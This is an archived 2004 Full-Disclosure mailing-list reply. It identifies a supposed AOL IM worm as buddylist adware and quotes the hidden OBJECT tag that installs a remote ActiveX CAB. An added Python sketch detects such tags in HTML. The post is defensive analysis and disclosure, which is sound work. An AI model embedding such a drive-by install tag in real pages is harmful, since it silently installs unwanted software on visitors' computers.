
SV: [Full-Disclosure] AOL IM Worm

From: Peter Kruse <kruse@krusesecurity.dk>
Date: Wed Feb 11 2004 - 15:18:24 EST

Hi,

It's a Buddylist Adware. The page uses codebase object to run the
ActiveX component:

<OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0
CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4"
CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0,0,001">

The cab file contains the files Shellinstaller.ini (2.119 bytes) and the
binary ShellInstaller.ocx (81.920 bytes). The ActiveX component hooks
itself to IE and works as a typical adware component. No virus code
here.

McAfee has posted a writeup at this URL:
http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=101007

Regards
Peter Kruse

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Received on Wed Feb 11 15:54:20 2004
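
A detection sketch for the pattern described in the message above, added here as an example and not part of the original post: it scans saved HTML for OBJECT tags that name a CLSID and pull an installable file from a remote CODEBASE. The function name scan_objects, the extension list and the second (benign) OBJECT tag in the sample are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# First tag: the one quoted in the message. Second tag: constructed benign control.
SAMPLE = '''<html><body>
<OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0
CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4"
CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0,0,001">
</OBJECT>
<object classid="clsid:00000000-0000-0000-0000-000000000000"
        width="320" height="240"></object>
</body></html>'''

INSTALLABLE = (".cab", ".ocx", ".dll", ".exe")  # assumed list of payload types


class ObjectTagScanner(HTMLParser):
    """Collect <object> tags that would trigger a remote ActiveX install."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        a = {k: (v or "").strip() for k, v in attrs}
        classid = a.get("classid", "")
        if tag != "object" or not classid.lower().startswith("clsid:"):
            return
        url = urlsplit(a.get("codebase", ""))
        if url.scheme not in ("http", "https", "ftp"):
            return  # no remote CODEBASE: nothing is downloaded
        reasons = ["remote-codebase"]
        if url.path.lower().endswith(INSTALLABLE):
            reasons.append("installable-payload")
        if a.get("width") in ("0", "0px") and a.get("height") in ("0", "0px"):
            reasons.append("hidden-0x0")  # control is invisible to the user
        frag = url.fragment
        version = frag.partition("=")[2] if frag.lower().startswith("version=") else None
        self.findings.append({"clsid": classid[6:].upper(), "host": url.hostname,
                              "file": url.path.rsplit("/", 1)[-1],
                              "version": version, "reasons": reasons})


def scan_objects(html):
    scanner = ObjectTagScanner()
    scanner.feed(html)
    return scanner.findings


if __name__ == "__main__":
    for finding in scan_objects(SAMPLE):
        print(finding)
```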

This archive was generated by hypermail 2.1.8 : Wed Feb 11 2004 - 16:01:03 EST
